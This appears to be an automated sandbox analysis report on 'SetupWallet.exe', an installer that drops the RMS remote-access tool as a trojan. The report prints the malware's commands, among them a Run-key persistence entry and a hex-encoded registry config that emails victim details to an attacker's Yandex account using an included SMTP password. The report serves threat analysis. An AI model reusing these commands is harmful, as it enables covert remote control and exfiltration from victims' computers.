rms | c6aaa202c84a30b41d1d01ae6c94a73dd4ab92af7f9665d543493258e7a61fdd

Analysis

max time kernel
4294221s
max time network
171s
platform
windows7_x64
resource
win7-20220310-en
submitted
17-03-2022 01:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SetupWallet.exe
Size

6.8MB
MD5

5ed4af2f49c3a4766bd4094209a3a030
SHA1

42d0072de6ed12bd605a0362cbe2330c69a93d88
SHA256

65526a403bca2df4dbcbb9997a8d012d6910ffe02342d790e5209eeb339d1027
SHA512

6f238ddb43316e3cc9352caab9103f447938d500db2fa5d074bbdc1d76958306839b6fed352517e9d5d4b861ac14dbb4bdd313c8b94a791b58208d2f328f26fe

Score

10^/10

rms persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 3 IoCs

pid	Process
640	SetupWallet.tmp
1812	rutserv.exe
552	rutserv.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Control Panel\International\Geo\Nation	rutserv.exe

Loads dropped DLL 5 IoCs

pid	Process
1428	SetupWallet.exe
1812	rutserv.exe
1812	rutserv.exe
552	rutserv.exe
552	rutserv.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\serv = "C:\\ProgramData\\Immunity\\rutserv.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
428	timeout.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1312	taskkill.exe
2032	taskkill.exe
1132	taskkill.exe
1872	taskkill.exe
1352	taskkill.exe
1572	taskkill.exe
1496	taskkill.exe
1688	taskkill.exe
428	taskkill.exe
1264	taskkill.exe
984	taskkill.exe
1016	taskkill.exe
1132	taskkill.exe
1600	taskkill.exe
1604	taskkill.exe
1648	taskkill.exe
1296	taskkill.exe
1992	taskkill.exe
1292	taskkill.exe
2032	taskkill.exe
1548	taskkill.exe
2036	taskkill.exe
848	taskkill.exe
1644	taskkill.exe
988	taskkill.exe
1596	taskkill.exe
892	taskkill.exe
1700	taskkill.exe
676	taskkill.exe
892	taskkill.exe
1320	taskkill.exe
1812	taskkill.exe
2036	taskkill.exe
652	taskkill.exe
1080	taskkill.exe
736	taskkill.exe
1944	taskkill.exe
1588	taskkill.exe
1268	taskkill.exe
1332	taskkill.exe
2036	taskkill.exe
1312	taskkill.exe
1032	taskkill.exe
1288	taskkill.exe
1612	taskkill.exe
1032	taskkill.exe
1336	taskkill.exe
860	taskkill.exe
1644	taskkill.exe
1864	taskkill.exe
1080	taskkill.exe
1336	taskkill.exe
1648	taskkill.exe
1832	taskkill.exe
564	taskkill.exe
1332	taskkill.exe
564	taskkill.exe
1596	taskkill.exe
2044	taskkill.exe
1592	taskkill.exe
776	taskkill.exe
1512	taskkill.exe
1492	taskkill.exe
984	taskkill.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1812	rutserv.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
640	SetupWallet.tmp
640	SetupWallet.tmp
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
552	rutserv.exe
552	rutserv.exe
552	rutserv.exe
552	rutserv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	1812	rutserv.exe
Token: SeDebugPrivilege	1812	rutserv.exe
Token: SeDebugPrivilege	908	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeTakeOwnershipPrivilege	552	rutserv.exe
Token: SeTcbPrivilege	552	rutserv.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	776	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1304	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeTcbPrivilege	552	rutserv.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	736	taskkill.exe
Token: SeDebugPrivilege	1292	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	240	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
640	SetupWallet.tmp

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
1812	rutserv.exe
552	rutserv.exe
552	rutserv.exe
552	rutserv.exe
552	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 1428 wrote to memory of 640	1428	SetupWallet.exe	27
PID 640 wrote to memory of 1840	640	SetupWallet.tmp	30
PID 640 wrote to memory of 1840	640	SetupWallet.tmp	30
PID 640 wrote to memory of 1840	640	SetupWallet.tmp	30
PID 640 wrote to memory of 1840	640	SetupWallet.tmp	30
PID 1840 wrote to memory of 1992	1840	cmd.exe	32
PID 1840 wrote to memory of 1992	1840	cmd.exe	32
PID 1840 wrote to memory of 1992	1840	cmd.exe	32
PID 1840 wrote to memory of 428	1840	cmd.exe	33
PID 1840 wrote to memory of 428	1840	cmd.exe	33
PID 1840 wrote to memory of 428	1840	cmd.exe	33
PID 1840 wrote to memory of 1812	1840	cmd.exe	34
PID 1840 wrote to memory of 1812	1840	cmd.exe	34
PID 1840 wrote to memory of 1812	1840	cmd.exe	34
PID 1840 wrote to memory of 1812	1840	cmd.exe	34
PID 1840 wrote to memory of 1132	1840	cmd.exe	35
PID 1840 wrote to memory of 1132	1840	cmd.exe	35
PID 1840 wrote to memory of 1132	1840	cmd.exe	35
PID 1840 wrote to memory of 908	1840	cmd.exe	38
PID 1840 wrote to memory of 908	1840	cmd.exe	38
PID 1840 wrote to memory of 908	1840	cmd.exe	38
PID 1840 wrote to memory of 2020	1840	cmd.exe	39
PID 1840 wrote to memory of 2020	1840	cmd.exe	39
PID 1840 wrote to memory of 2020	1840	cmd.exe	39
PID 1840 wrote to memory of 1332	1840	cmd.exe	40
PID 1840 wrote to memory of 1332	1840	cmd.exe	40
PID 1840 wrote to memory of 1332	1840	cmd.exe	40
PID 1840 wrote to memory of 1268	1840	cmd.exe	41
PID 1840 wrote to memory of 1268	1840	cmd.exe	41
PID 1840 wrote to memory of 1268	1840	cmd.exe	41
PID 1840 wrote to memory of 2036	1840	cmd.exe	42
PID 1840 wrote to memory of 2036	1840	cmd.exe	42
PID 1840 wrote to memory of 2036	1840	cmd.exe	42
PID 1840 wrote to memory of 564	1840	cmd.exe	43
PID 1840 wrote to memory of 564	1840	cmd.exe	43
PID 1840 wrote to memory of 564	1840	cmd.exe	43
PID 1840 wrote to memory of 2044	1840	cmd.exe	44
PID 1840 wrote to memory of 2044	1840	cmd.exe	44
PID 1840 wrote to memory of 2044	1840	cmd.exe	44
PID 1840 wrote to memory of 1592	1840	cmd.exe	45
PID 1840 wrote to memory of 1592	1840	cmd.exe	45
PID 1840 wrote to memory of 1592	1840	cmd.exe	45
PID 1840 wrote to memory of 1644	1840	cmd.exe	46
PID 1840 wrote to memory of 1644	1840	cmd.exe	46
PID 1840 wrote to memory of 1644	1840	cmd.exe	46
PID 1840 wrote to memory of 776	1840	cmd.exe	47
PID 1840 wrote to memory of 776	1840	cmd.exe	47
PID 1840 wrote to memory of 776	1840	cmd.exe	47
PID 1840 wrote to memory of 1956	1840	cmd.exe	48
PID 1840 wrote to memory of 1956	1840	cmd.exe	48
PID 1840 wrote to memory of 1956	1840	cmd.exe	48
PID 1840 wrote to memory of 988	1840	cmd.exe	49
PID 1840 wrote to memory of 988	1840	cmd.exe	49
PID 1840 wrote to memory of 988	1840	cmd.exe	49
PID 1840 wrote to memory of 1872	1840	cmd.exe	50
PID 1840 wrote to memory of 1872	1840	cmd.exe	50
PID 1840 wrote to memory of 1872	1840	cmd.exe	50
PID 1840 wrote to memory of 1832	1840	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1428
- C:\Users\Admin\AppData\Local\Temp\is-IMG6H.tmp\SetupWallet.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-IMG6H.tmp\SetupWallet.tmp" /SL5="$30156,6348230,780800,C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46383041413939302d414432332d343543432d423131352d4439383834443532373335387d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e747275653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e776577626f6f6c4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e20496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2671756f743be2968220e2968320e2968420e2968520e29686e298a354686520636f6d7075746572e298a3e2968620e2968520e2968420e2968320e2968220202671756f743b2c2c2671756f743b49443a20254944252671756f743b2c2671756f743b557365726e616d653a2025555345524e414d45252671756f743b2c2671756f743b436f6d7075746572206e616d653a2025434f4d504e414d45252671756f743b2c2671756f743b5468652075736572207761732070726573656e7465642061733a202553454c464944252671756f743b3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
      4⤵
      PID:1992
  - - C:\Windows\system32\timeout.exe
      TIMEOUT /T 3
      4⤵
      Delays execution with timeout.exe
      PID:428
  - - C:\ProgramData\Immunity\rutserv.exe
      "C:\ProgramData\Immunity\rutserv.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1812
    - - C:\ProgramData\Immunity\rutserv.exe
        
        C:\ProgramData\Immunity\rutserv.exe -run_agent -second
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:552
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1132
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:908
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2020
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1332
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1268
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:776
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1956
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:988
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1872
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1960
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1812
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1304
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1828
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1508
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1308
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1596
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1312
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1992
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1336
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1132
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:860
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:652
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1332
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1080
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:892
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1512
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1292
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1016
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1352
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:240
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1160
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1600
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1596
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1992
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1788
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1944
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1960
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:576
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1296
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:2044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1604
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1700
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1572
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:676
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1544
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1960
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1268
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:892
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1496
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1312
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1016
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1648
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1336
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1320
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1960
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:2032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1080
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1612
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1492
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
